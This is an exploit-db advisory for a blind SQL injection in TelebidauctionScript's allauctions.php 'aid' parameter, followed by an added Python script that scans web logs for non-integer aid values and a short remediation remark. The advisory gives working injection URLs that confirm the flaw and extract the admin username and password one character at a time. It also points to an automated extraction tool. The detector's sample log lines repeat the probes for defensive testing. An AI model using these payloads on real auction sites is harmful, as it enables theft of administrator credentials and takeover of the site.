forked from offensive-security/exploitdb
TelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________
Author : Hussin X
Home : www.IQ-TY.com
email : darkangel_g85@Yahoo.com
____________________________________
Vendor : http://www.telebidauctionscript.com/
Demo :
_______
http://server/allauctions.php?aid=2+and+1=1 (true)
http://server/allauctions.php?aid=2+and+1=0 (false)
:: Table ::
http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1
:: column pass and username ::
http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1
http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1
Note : use "bsqlbf" to write detailed information
Greetz
WwW.IQ-ty.CoM , Tryag.cc
| CraCkEr | Cyber-Zone | str0ke | jiko
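
Added example, not part of the original advisory: a log check that flags requests to allauctions.php whose aid value is not a plain integer, which is how the true/false probes above appear in web server logs. The script name and parameter come from the advisory; the combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); documentation IP range.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /allauctions.php?aid=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /allauctions.php?aid=2+and+1=1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:06 +0000] "GET /allauctions.php?aid=2%20and%201=0 HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2024:10:00:07 +0000] "GET /allauctions.php?aid=2 and 1=1 HTTP/1.1" 200 5120',
    '198.51.100.8 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?aid=abc HTTP/1.1" 200 100',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /allauctions.php?aid=15&page=2 HTTP/1.1" 200 4300',
]

# Lazy match up to the trailing protocol token so a URL logged with raw
# spaces is still captured whole.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')
# A legitimate auction id is assumed to be a short run of ASCII digits.
PLAIN_INT = re.compile(r'[0-9]{1,10}')


def non_integer_aid_requests(lines, script="/allauctions.php"):
    """Return (client, decoded aid value) for each request to `script`
    whose aid parameter is anything other than a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(script):
            continue  # other scripts are out of scope for this check
        # parse_qs decodes both '+' and %20, so every encoding of the same
        # probe collapses to one value before the integer test.
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("aid", []):
            if not PLAIN_INT.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in non_integer_aid_requests(SAMPLE_LOG):
        print(f"{client}\taid={value!r}")
```

The same integer test belongs in the application itself: rejecting or casting aid before it reaches the query, and binding it as a parameter, removes the injection point rather than only detecting its use.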